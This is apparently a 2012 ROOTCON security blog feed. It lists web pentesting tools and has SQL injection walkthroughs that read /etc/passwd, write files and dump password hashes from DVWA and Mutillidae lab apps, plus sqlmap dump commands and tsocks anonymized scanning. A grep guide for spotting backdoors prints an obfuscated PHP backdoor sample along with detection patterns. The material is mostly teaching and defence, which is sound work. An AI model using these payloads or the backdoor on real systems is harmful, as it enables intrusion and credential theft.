Introducing 35 Pentesting Tools Used for Web Vulnerability Assessment

March 9, 2012, 8:09 am

≫ Next: SQL Injection Using MySQL LOAD_FILE() and INTO OUTFILE()

1. w3af

w3af or Web Application Attack and Audit Framework is an open source penetration testing tool for finding web vulnerabilities and an exploit tool that comes with cool plugins like sqlmap, xssBeef, and davShell. w3af automatically updates itself every time you launch the tool making it a very reliable tool for website hacking. For more information just check out their website hosted at SourceForge.

2. Acunetix Web Vulnerability Scanner

Acunetix WVS or Web Vulnerability Scanner is a pentesting tool for Windows users so that they may be able to check for SQL Injection, Cross Site Scripting (XSS), CRLF injection, Code execution, Directory Traversal, File inclusion, checks for vulnerabilities in File Upload forms and other serious web vulnerabilities. You can download this tool here.

3. SQLninja

SQLninja is a an sql injection tool for web applications that use Microsoft SQL Server as its back-end though it runs only in Linux, Mac and BSD. It requires perl modules; NetPacket, Net-Pcap, Net-DNS, Net-RawIP, and IO-Socket-SSL. You can download this tool here.

4. Nikto

Nikto is an open source web server scanner “which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it easy to use and and performs scanning faster. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Although not all checks are really a big security problem but most are like XSS (Cross Site Scripting) Vulnerabilities, phpmyadmin logins, etc. Nikto alerts and gives you security tips in order to prevent your website from various attacks.

5. SQLmap

SQLmap is an open source automatic SQL injection and database takeover tool that fully supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server. It partially supports Microsoft Access, DB2, Informix, Sybase and Interbase. Download sqlmap here.

6. Pangolin 3.2.3

Pangolin is another sql injection scanner for web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, and Sybase. Its features include keyword auto analysis, supports HTTPS, has bypass firewall setting, injection digger, data dumper, etc. You can download its zip file here.

7. Havij v1.15 Advanced SQL Injection

Havij is another famous automatic sql injection tool that has a free and premium version. The free version only supports a few injection methods like MsSQL 2000/2005 with error, MsSQL 2000/2005 no error union based, MySQL union based, MySQL Blind, MySQL error based, MySQL time based, Oracle union based, MsAccess union based, and Sybase (ASE). It also includes an admin finder and an md5 cracker.

8. SQL Power Injector

SQL Power Injector is a web pentesting application created in .Net 1.1 that helps the penetration tester and hackers find and exploit SQL injections on a web application that uses SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing Database Management System when using the inline injection or normal mode. You can download the latest version of this tool which includes a Firefox plugin here.

9. VulnDetector

VulnDetector is a project coded in python which scans a website and detects various web based security vulnerabilities in the website. It was developed by Brad Cable who is into coding open source tools. You can download the script here.

10. SQLIer 0.8.2b

SQLIer is another project of Brad Cable and is a shell script that determines all the necessary information to build and exploit an SQL Injection vulnerability to a URL by itself without user interaction unless it can't guess the table or field names for the database correctly. SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. Download the shell script here.

11. bsqlbf-v2

bsqlbf-v2 or Blind Sql Injection Brute Forcer version 2 is a perl script that allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. It supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server databases. You can download the perl script on a Google hosted project.

12. Marathon Tool

Marathon Tool is an alpha release SQL Injection tool or project that extracts information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases by using Time-Based Blind SQL Injection attack. The alpa release can be found here.

13. XSSer

XSSer or Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It also includes a GUI interface by using the command : ./xxser --gtk. You can download xxser's beta version here.

14. ASP Auditor v2.2

ASP Auditor v2.2 is a an auditing tool for ASP that sends initial probe request, path discovery request, ASP.NET validate discovery request, ASP.NET Apr/07 XSS Check, application trace request, and null remoter service request. By using the opt command -bf, it allows you to brute force ASP.NET version using JS Validate directories.

15.Absinthe

"Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. This tool does not aid in the discovery of SQL Injection holes but speeds up the process of data recovery." It supports Microsoft SQL Server, MSDE, Oracle, and Postgres and the tool runs on Linux, Windows and Mac OSX. Download here.

16. SQID

SQID or SQL injection digger is a command line tool written in ruby by Metaeye Security Group that looks for SQL injections and common errors in web sites. It performs a Google search when finding for SQL injections and common errors in web site URLs and crawls a webpage. You can download this tool by checking out its project SVN:

svn checkout svn://rubyforge.org/var/svn/sqid

17.DarkMySQLi

DarkMySQLi is a multi purpose MySQL Injection tool coded in python which is also available for BackTrack 5 as one of its packed tools.

18. fimap

fimap is an automatic LFI/RFI scanner and exploiter coded in python by Iman Karim. It allows a pentester to scan a single URL for File inclusion errors, scan a list of URLS for File Inclusion errors, scan Google search results for FiIe inclusion errors, and harvest all links of a webpage with recurse level of 3 and write the URLs to a file directory.

19.Script Hex Dump – Forensic Tool

Script Hex Dump - Forensic Tool is a java application that helps you in parsing your scripts like PHP and automatically converts it as a hex value, some penetration testers use this to test for possible sql injection vulnerability in a website. SQL Injection attack has been a chronic threat especially for those websites running PHP and MySQL as the backend of their database server, one of its capability if the server is not properly configure is the command for writing arbitrary files. You can download this tool here.

20. PHP Vulnerability Hunter

PHP Vulnerability Hunter is a PHP web application fuzzer that scans for common vulnerabilities like local file inclusion, SQL Injection, full path disclosure, arbitrary command execution and many more. A good tool for analyzing your own web server. You can grab the new version of this tool here which is 1.1.4.6.

21. WSTOOL : Web vulnerable scan tool

WATOOL is a server error and SQL Injection, XSS or Cross Site Scripting scanner which uses PHP Check up collate with HTML FORM and LINK. You can download this tool here.

22. ProjectX WHMCS Pentesting Tool v.1

Projectx WHMCS Pentesting Tool v.1 is a vulnerability scanner coded in VB.NET that uses a black box approach. It echos the db_username and the db_password of a website that is vulnerable to WHMCS Local File Disclosure. This kind of vulnerability is only applicable to versions 3.x.x and some 4.x.x which was a viral exploit last year that some website administrators took for granted. You can download the tool here.

23. Wpscan

WPscan or Wordpress Security Scanner is a pentesting tool written in ruby for Wordpress installations. The tools is coed by Ryan Dewhurst which uses a black box approach in finding security holes for Wordpress like timthumb, easy to guess passwords, plugin holes, etc. You can download wpscan here.

24. Skipfish

Skipfish is an active web application security reconnaissance tool written by Michal Zalewski. Skipfish spiders a URL using the wordlists, a very powerful web scanning tool with a simple implementation. It also scans for vulnerabilities like php injection, XSS, format string vulnerabilities, overflow vulnerabilities, file inclusions , etc. You can download this tool here.

25. WhatWeb

WhatWeb is a web scanner coded by Andrew Horton aka urbanadventurer from Security-Assessment.com. It is used for information gathering because it identifies content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers, etc. You can download this tool here.

26. OWASP ZAP

Zed Attack Proxy (ZAP) is a project of OWASP which is a GUI penetration testing tool for finding website vulnerabilities and flaws. This open source tool includes features like intercepting proxy, active scanner, passive scanner, brute force scanner, spider, fuzzer, port scanner, dynamic SSL certificates, API, and Beanshell integration. For more information about this tool, check out their website.

27. Webshag

Webshag is a multi-threaded, multi-platform web server auditing tool coded in python. It is used for crawling a URL, port scanning, file fuzzing and audits your website. You can download this security auditing tool here.

28. OWASP DirBuster

DirBuster is another project of OWASP that a multi threaded java application designed to brute force directories and files names on web/application servers that uses a black box approach for application testing by trying to find hidden content. You can download this tool here.

29. Grendel-Scan

Grendel-Scan is free and open source web application pentesting tool that has an automatic scanning feature which detects common web application vulnerabilities, and features geared at aiding manual penetration tests. Get this tool now.

30. Mopest

Mopest is a PERL Local PHP Vulnerability Scanner for exploits PhpBB 2.0.20 Disable Administrator, PhpBB 2.0.19 Denial of Service - Infinitely topic, phpBB 2.0.15 Database Authentication Details, Invision Power Board 2.0.2 Multipl Users DoS, Invision Power Board 2.1.5 Code Execution, MyBB 1.0 RC4 Sql injection, MyBB 1.1.3 Create An Admin, MyBB Sql Injection, and WordPress 1.5.11 Sql Injection. It also has tools like Fake Mailer, Email Bomber, and MD5 Cracker. You can check out this project here.

31. SecuBat

SecuBat is another web vulnerability scanner which automatically analyzes web sites with the aim of finding exploitable SQL injection and XSS vulnerabilities. You can check this tool here.

32. Arachni

Arachni is an open source web application security scanner framework coded in ruby that helps website administrators and penetration testers evaluate the security of a web application. Arachni asks you for the URL of the target and it automatically performs a simple scan and presents you with its findings which could be a very risky flaw or loophole. You can download this tool here.

33. WebSlayer

WebSlayer is another OWASP project that slays your web application by brute forcing the GET and POST parameters, checking the directories, brute forcing the login forms, fuzzing, brute forcing sessions, Ntml brute forcing, and many more. For more information of this project just check this site.

34. Burp Suite

Burp Suite is penetration testing tool and integrated platform for website security. Burp Suite has cool features like an intercepting proxy, application spider for crawling, detects numerous web application vulnerabilities, repeater tool, allows you to write your own plugins, and many more. The free edition is available for download here.

35. ProxMon

ProxMon is not a Digimon but a Python based open source framework that automates web application tests. Its key features include:

- automatic value tracing of set cookies, sent cookies, query strings and post parameters across sites,
- proxy agnostic
- included library of vulnerability checks
- active testing mode
- cross platform
- easy to program extensible python framework

You can download this tool here.

About the Contributor:

Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security. He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

↧

SQL Injection Using MySQL LOAD_FILE() and INTO OUTFILE()

March 24, 2012, 8:55 am

≫ Next: SQL Injection Cheat Sheet for Damn Web Vulnerable Application

≪ Previous: Introducing 35 Pentesting Tools Used for Web Vulnerability Assessment

SQL injection is one of the most chronic threats in websites today. There are many kinds of SQL injection techniques like the use of union statements, order by statements, LOAD_FILE(), INTO OUTFILE(), INFORMATION_SCHEMA, Char(), CAST(), and LIMIT. Most attackers are just into using the union statements, information_schema and order by statements and neglecting some of the techniques just for the sake of getting the username and the password of the website administrator. Just like this:

' union select 1,username,password,4 from users -- -

But just because some attackers don't use the other techniques doesn't mean you are safe from other attackers. All right let's get to the point, in this article let's discuss about the some possible things we can by using the LOAD_FILE() and INTO OUTFILE() functions partnered with union select statements.

MySQL LOAD_FILE() reads the file and returns the file contents as a string.

SYNTAX : LOAD_FILE(file_name) /* file_name should be a name of a file appended with a path. */

Ohw wait?! Path? Yes you read me right! In that case an attacker could possibly do a directory traversal just like the Local File Inclusion (LFI) attack.

Suppose we found out the number of columns, then we should execute the union select query together with the syntax of the LOAD_FILE() function to achieve the attack vector. In this example we are

' union select 1,load_file('/etc/passwd'),3,4 -- -

Thus, its is very dangerous because if an attacker gets to see the encrypted actual passwords of a user's account under /etc/shadow because he /she may try to crack it. For the detailed information about directory traversal, you can check out my previous article about Local File Inclusion 101.

Next up, the INTO OUTFILE () Function. By using this kind of function, it allows attacker to create a file on a specified path after the syntax INTO OUTFILE '.

Take for example this:

' union select 1,'shipcode was here',3,4 into outfile '/tmp/lol.txt' -- -

' union select null,'shipcode was here',null,null into outfile '/tmp/lolz.txt' -- -

So in case /var/www/ is writable then the attacker should be able to append a PHP system call into an injection, and writes the query into an outfile.

About the Contributor:

↧

SQL Injection Cheat Sheet for Damn Web Vulnerable Application

March 29, 2012, 2:16 am

≫ Next: ROOTCON 6 Registration Now Live!!!

≪ Previous: SQL Injection Using MySQL LOAD_FILE() and INTO OUTFILE()

Damn Web Vulnerable Application or DVWA is one of my favorite web applications for website penetration testing and web attacking. It is easier for the learner to attack the web application because there is a View Source and View Help command button on . It gives a hint on the pentester some tips about the web application just like the actual SQL Query command.

In this paper, I will give some tips on how SQL Injection is done in order to get the usernames and passwords in the database that DVWA is using. We will attack the web application using manual sql queries and without the use of automated tools like sqlmap, sqlninja, mole, etc. because the best way to learn web penetration testing is to do it manually but let me not discourage you in not using tools too because tools can be of great help.

So now let's start, this is the vulnerable web page for SQL Injection:

Now let's try to put a value on the User ID Field and see what happens.

User ID: 1

Right, the results is:

ID: 1
First name: admin
Surname: admin

It pulled out the first_name and the surname of the User ID number 1. Thus if we put another value like 2 it should give another result. The actual SQL query:

SELECT first_name, last_name FROM users WHERE user_id ='1';

That's why it pulled the columns first_name and last_name from the table user whose user_id is 1.

Now let's try to put a single quote / ' after user_id "1" to check how the web application reacts and to check how it handles quotes.

Yey, it is exploitable because after single quote is also detected by the web application as an SQL query.

Now time to find the number of columns in the database by using the the ORDER BY syntax and increment the number by 1 until the application gives an error. We use a comment character / # at the end or you may use the comment sequence / -- - to close the query after the single quote. :)

1' order by 1 #

1' order by 2 #

1' order by 3 # > error

From what you can see from the image above, it returns an error after the statement SELECT first_name, last_name FROM users WHERE user_id ='1' order by 3 # because column 3 doesn't exist thus there are only two columns that we can use.

Now let's use the Union Select Statement:

1' union select 1,2 #

Now from the image above, you can see that in the First Name and Surname output, you can see two numbers; 1 and 2. Yeah the page is a bit messed up and in some websites only numbers will start appearing on the page.

These numbers are the column numbers we can get information from. We will replace them with statements later on. In fact you can replace the values of the two numbers that are identical to the numbers you inputted on the union select. Take for example finding the mysql version:

1' union select @@version,2 #

1' union select version(),2 #

Hello version 5.1.41!

Now let's find the tables in the database:

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #

Boooom! The users table should contain good information :))

Now let's try to check the all the columns in the database:

1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() #

Did I just see column_names user and password? Yeah, we could then use that column names.

Now it's time to pawn the users table:

1' union select user,password from users #

Thus, the next thing that an attacker should do is to crack the hashed passwords of users admin, gordonb, 1337, pablo and smith.

Find the current database user and pawn him

Now let's find the current database user of this web application:

1' union select user(),2 #

1' union select system_user(),2 #

Hey it's running root, if that's the case then I can list hashed passwords for mysql.user:

1' union select user,password from mysql.user #

Very risky isn't it? That is why you should fix your codes like using mysql_real_escape_string, clean URLs, web application firewall, parameterized queries and array_map.

Check out my previous article too which is also a cheat sheet for DVWA:

SQL Injection using MySQL Load File and Into Outfile

About the Contributor:

↧

ROOTCON 6 Registration Now Live!!!

April 2, 2012, 2:32 pm

≫ Next: Call For InfoSec Celebs

≪ Previous: SQL Injection Cheat Sheet for Damn Web Vulnerable Application

This year's ROOTCON is much awesome with our selected tracks and carefully planned activities. April 1, 2012 we are pleased to announce that the early registration for ROOTCON 6 is now live.

Our updated tracks (here) updated real time
Our awesome speakers (here)
This year's venue (here)

Last year we had two Registration methods: Paypal and Offline payment (manually sending out email to registration [at] rootcon dot org). The tagging of attendees was pretty hard for the ROOTCON crew, thus, this year we opted to have a new registration system which is EventBrite. You will still have the option to pay offline or pay through PayPal but the up-side for us is that tagging of attendees and slots is much more precise, so we won't be re-opening the registration over and over again after we recount our available slots.

On the new registration system there will still be offline payments through direct deposit and there will also be PayPal payments. You will still receive an e-ticket for the event marked as payment-not-received, however, your reservation will stay on the system for 48 hours, FAILURE OF PAYMENT WITHIN 48 HOURS WILL FORFEIT YOUR RESERVATION. If you deposited your payment already, send us a copy of the scanned deposit slip to registration [at] rootcon dot org with subject [ROOTCON 6 REGISTRATION - YOUR NAME] and we will be sending you another e-ticket marked as payment-received. For Paypal payment you will receive your e-ticket right away after you purchase them.

PRINT YOUR E-TICKET and BRING THEM TO THE CONFERENCE CHECK-IN DESK TO RECEIVE YOUR BADGE AND OTHER FREEBIES

What our you waiting for GRAB YOUR TICKET NOW!!!!

See you at the CON
Semprix and the ROOTCON Crew

↧

Call For InfoSec Celebs

April 2, 2012, 2:57 pm

≫ Next: We want you to come!!!

≪ Previous: ROOTCON 6 Registration Now Live!!!

Who Wants To Speak?

ROOTCON is looking for InfoSec Celebrities both local and internationl. If you think you have the skills and talents to be one of the InfoSec celebrities we will be delighted if you will join us =)

As a backgrounder ROOTCON is a grassroots event, organized by users for users. We welcome attendees from all over the world, after all security is borderless and global in nature. We support sharing best practices and appreciate cooperation from our international supporters. If you would like to speak at our event and reside outside the Philippines, we will be happy to sponsor your hotel but are currently not able to sponsor any international airfares due to our volunteer-driven organization.

Support the Hacker Community Globally!!!

Hackers Unite

↧

We want you to come!!!

April 3, 2012, 12:56 am

≫ Next: 3 Common Automated Tools with GUI Used for Wireless Cracking / Pentesting

≪ Previous: Call For InfoSec Celebs

We want you to able to join the fun and learning we share at ROOTCON, with that we made it easy for everyone to get approval from you boss and HR personnel. You may download our pre-formatted and digitally signed Letter Of Approval.

Download the Letter Of Approval

↧

3 Common Automated Tools with GUI Used for Wireless Cracking / Pentesting

April 6, 2012, 7:28 am

≫ Next: Dumping Like a Boss - sqlmap 101

≪ Previous: We want you to come!!!

1. wifite

wifite is a mass WEP/WPA WiFi Cracker that is coded in python which makes cracking WIFI passwords and security easier, it uses the aircrack-ng suite. It can be executed by using the command line python wifite.py or ./wifite.py. To see a list of command lines with detailed information for the script, you can just type in the terminal ./wifite.py –help or python wifite.py –help. What makes this tool easier is that it also has a GUI mode which runs by default after executing the script if it has a python-tk module. You can download the python script here.

2. Fern WIFI Cracker

Fern Wifi Cracker is another GUI for easier wireless penetration testing which uses the aircrack-ng suite of tools. It is coded in python and uses python-qt4. Very similar to wifite because you need macchanger, xterm, and aircrack-ng as its prerequisites. But uses python-qt4 instead of python-tk for the GUI. You can download this project here.

3. Gerix Wifi Cracker

Gerix Wifi Cracker a simple graphical user interface just like wifite and Fern Wifi Cracker. It is a project made by Tiger Security and has been one of the tools added in BackTrack Linux since the BackTrack 4 Pre-Final if I'm not mistaken. It's also coded in python and you surely need qt (v.3) for this. You can download it here or if you are using BackTrack, you should be able to find this tool in /usr/share/gerix-wifi-cracker-ng.

About the Contributor:

↧

Dumping Like a Boss - sqlmap 101

April 6, 2012, 10:36 pm

≫ Next: ROOTCON Easter Egg Hunt

≪ Previous: 3 Common Automated Tools with GUI Used for Wireless Cracking / Pentesting

SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.

Databases enumerated:

[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump

Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts;

Now's let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump

Similar query: Select * from credit_cards;

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.

About the Contributor:

↧

ROOTCON Easter Egg Hunt

April 7, 2012, 7:19 am

≫ Next: ROOTCON Easter Egg Solution

≪ Previous: Dumping Like a Boss - sqlmap 101

Here we go, ROOTCON Easter Egg Hunt.

Instructions (Read Carefully)
1. Search for each word contained on each egg
2. Gather all words found on each egg
3. Combine all words into one
4. Send your code to registration [at] rootcon d0t org
5. You are entitled for a 50% discount ;-)

Start cracking some eggs at http://easteregg.rootcon.org/

Remember: This is a race, so the promo code is valid for one use only

GOOD LUCK!!! and HAPPY EASTER

↧

ROOTCON Easter Egg Solution

April 7, 2012, 5:00 pm

≫ Next: Tunneling the Applications you launched on your Terminal with Tsocks

≪ Previous: ROOTCON Easter Egg Hunt

The ROOTCON Easter Egg Hunt is over, the hunt was pretty simple and straight forward, you just need to know some of the basic arsenal in your day to day hacking escapade.

The Solution:

Easter Egg #1 = The image show Master Yoda speaking the very familiar line "May the source be with you" followed by "A n00b you are". If you are a geek and into tech, you wouldn't miss watching Star Wars, the line "May the force be with you", was replaced with source, meaning it's giving you a hint that the first egg can be found on the source code of the page egg1.php

Easter Egg #2 = Easter Egg #2 has something to deal with braille, we gave the hint "3 blind mice", so you need to decode the braille dots into letters.

Easter Egg #3 = The ROOTCON Vault, this is pretty easy, you can de-crypt the vault using uudecode, or even Perl can unpack it. The first line of the vault says Begin blah blah, this should give you enough hint how it was being encrypted.

Easter Egg #4 = This Easter Egg is very simply, the picture of Cookie Monster says it all plus the text we placed. "Cookie" Monster. "No Cookie For You". The hint tells you that the next word is hidden under the site cookie. There are a lot of Add-ons, Plugins for browsers that will let you examine what is written off its cookie, Google Chrome has its native tool to do that "Developer Tools"

Easter Egg #5 = Again going back to the "image text" for hints, it says "Undress the ROOTCON Easter Bunny". The easter bunny is an image, to undress or to get information under an image you need to examine the EXIF attributes found on the image.

Only the first one to crack all the codes who will be entitle for the 50% discount offer for the ROOTCON 6 ticket.

Here are the top four winners (Click the image to enlarge)
(Note: We masked the Lastname of the winners to protect their identity)

I hope everyone enjoyed our little Easter Special.

ROOTCON

↧

Tunneling the Applications you launched on your Terminal with Tsocks

April 12, 2012, 8:08 am

≫ Next: ClubHack Magazine April 2012 Issue Released!

≪ Previous: ROOTCON Easter Egg Solution

With some of the applications that don't have proxy configurations or settings, how can we add anonymity to our information gathering, scanning, exploiting phases, etc. like nmapping, using theharvester to gather emails, and many more? It's bad leaving your footprints and logs right?

Well if we have tsocks application then it would be easier since it can send TCP connections automatically through a SOCKS server. If tsocks is not installed on your distro, you can just find it on the software repository. In my case, BackBox Linux has tsocks pre-installed. It can be used for TORifying or tunneling your applications that doesn't have proxy capabilities. Supposed I opened a certain SSH server then binded my localhost at 9191 TCP port, I need to configure /etc/tsocks.conf to:

local = 192.168.0.0/255.255.255.0

server = 127.0.0.1

server_type = 5

server_port = 9191

For TOR, you can just edit the server_port to 9050 because it opens a SOCKS local server at 9050 TCP port.

ssh -D 9191 user@hostname

After configuring tsocks, try to check if tsocks is working good by using the lynx web browser to connect to a website that tells you if you are tunneled or you could also tunnel to another ssh server and issue the command w/who. Be sure to put tsocks before the command. For example:

tsocks lynx whatismyip.net

The IP of the SSH Server ;)

The image below is my original IP without using ssh tunneling:

See the difference ayt!

So if I want to launch theharvester (email harvester) anonymously, I need add tsocks before theharvester command:

tsocks theharvester -d rootcon.org -l 500 -b google

Now you can run your pentesting tools with added anonymity :)

About the Contributor:

↧

ClubHack Magazine April 2012 Issue Released!

April 13, 2012, 9:45 am

≫ Next: Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

≪ Previous: Tunneling the Applications you launched on your Terminal with Tsocks

India's 1st Hacking Magazine which is ClubHack or CHmag has just released their April 2012 Issue. CHmag happens to be our media partner and that CHMag is one of the hacking/infosec magazines I'm currently following because of the good contents from various authors and for this issue I also contributed an article for the Mom's Guide. Here are the topics for this month's issue:

-Decoding ROT using the Echo and Tr Commands in your Linux Terminal
-How to enable WiFi on Matriux running inside VMWare
-Local File Inclusion
-Poster of the Month
-Provisions of Sec. 66B
-Sysinternals Suite
-XSS – The Burning issue in Web Application

The new burner for this issue is the new section which is the Code Gyan that started with a new topic entitled Local File Inclusion.

You can download the PDF File here or you could check out the archives for their previous issues in their official website.

About the Contributor:

↧

Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

April 26, 2012, 12:12 am

≫ Next: Hackxor - Web App Hacking Game

≪ Previous: ClubHack Magazine April 2012 Issue Released!

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php

Alright let's proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4, some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep --help for more information.

Common Usage for Finding Vulnerabilities
The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command:

grep -Rn "shell_exec *( " /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website.

Again, we can use these functions for searching possible vulnerable scripts in our web server:
grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www

There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files

Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:

<?php function KJnPCP($XZK)

{

$XZK=gzinflate(base64_decode($XZK));

for($i=0;$i<strlen($XZK);$i++)

{

$XZK[$i] = chr(ord($XZK[$i])-1);

}

return $XZK;

}

eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks

0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF

zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo
system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

Thus you could also easliy grep these functions:

grep -Rn "shell_exec *(" /var/www

grep -Rn "base64_decode *(" /var/www

grep -Rn "phpinfo *(" /var/www

grep -Rn "system *(" /var/www

grep -Rn "php_uname *(" /var/www

grep -Rn "chmod *(" /var/www

grep -Rn "fopen *(" /var/www

grep -Rn "fclose *(" /var/www

grep -Rn "readfile *(" /var/www

grep -Rn "edoced_46esab *(" /var/www

grep -Rn "eval *(" /var/www
grep -Rn "passthru *(" /var/www

In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add tcpflood and udpflood strings for grepping malicious files too because these are commonly used by IRC bots that have udpflood and tcpflood functions.

What you saw from the image above is a sample of a pBot which is a PHP IRC bot used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:

grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www

References:
http://25yearsofprogramming.com/blog/2010/20100315.htm
http://php.net/

About the Contributor:

↧

Hackxor - Web App Hacking Game

May 14, 2012, 9:41 pm

≫ Next: May 2012 issue of ClubHack Magazine is out now!

≪ Previous: Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

Are you a gamer and at the same time a penetration testing enthusiast in web applications?

Well then, you might wanna try whacking out 'hackxor'! Hackxor is a web application hacking game where players must locate and exploit vulnerabilities to progress through the story wherein you play as a blackhat hacker hired to track down another hacker by any means possible. It contains scripts that are vulnerable to Cross Site Scripting(XSS), Cross Site Request Forgery(CSRF), Structured Query Language Injection (SQLi), Remote Command Injection(RCE), and many more. It's also a web application running on Fedora 14.

Download & install instructions

1. Download the full version of hackxor (700mb)
2. Install VMWare Player (This involves creating a free account with vmware)
3. Extract hackxor1.7z, run the image using VMware player.
4. Work out what the IP of hackxor is ((try 172.16.93.129)|| logging into the VM with username:root pass:hackxor and typing ifconfig)
5. Configure your hosts file (/etc/hosts on linux) to redirect the following domains to the IP of hackxor: wraithmail, wraithbox, cloaknet, GGHB, hub71, utrack.
6. Browse to http://wraithmail:8080 and login with username:algo password:smurf

About the Contributor:

↧

May 2012 issue of ClubHack Magazine is out now!

May 15, 2012, 5:14 pm

≫ Next: Early Registration Closing Soon!!!!

≪ Previous: Hackxor - Web App Hacking Game

ClubHack Magazine's May 2012 issue has just been released yesterday guys and thanks to the Chmag Team for giving us free monthly issues!

Topics:

0x01 - Steganography over converted channels (Tech Gyan)
0x02 - Kauntilya (Tool Gyan)
0x03 - Section 66C - Punishment for identity theft (Legal Gyan)
0x04 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Gide)
0x05 - Don’t Get Injected – Fix Your Code (Code Gyan)

Download the new issue here.

About the Contributor:

↧

Early Registration Closing Soon!!!!

May 19, 2012, 3:11 pm

≫ Next: New CFP Submission

≪ Previous: May 2012 issue of ClubHack Magazine is out now!

Our 2 months run for the early registration will be closing this coming June 30, 2012. If you haven't registered yet, register now to get big discounts!!!

Visit the registration page now!!!

↧

New CFP Submission

May 19, 2012, 3:32 pm

≫ Next: ROOTCON 6 Call For Papers Now Close

≪ Previous: Early Registration Closing Soon!!!!

New CFP submission has landed our Inbox.

Topic Details

Presentation Title: Randomized/Obfuscated Text Detection
